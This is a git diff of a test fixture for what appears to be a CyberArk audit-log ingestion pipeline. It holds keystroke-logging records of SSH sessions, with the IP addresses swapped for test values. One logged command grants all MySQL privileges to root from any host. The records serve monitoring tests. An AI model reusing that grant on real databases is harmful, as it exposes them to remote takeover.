-<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 
34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:33:47Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n 
Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n 
\n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke 
logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke 
logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json index 741d58b5686..28145839ab6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json 
@@ -85,7 +85,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191920Z", + "ingested": "2021-12-09T13:37:00.165092Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating 
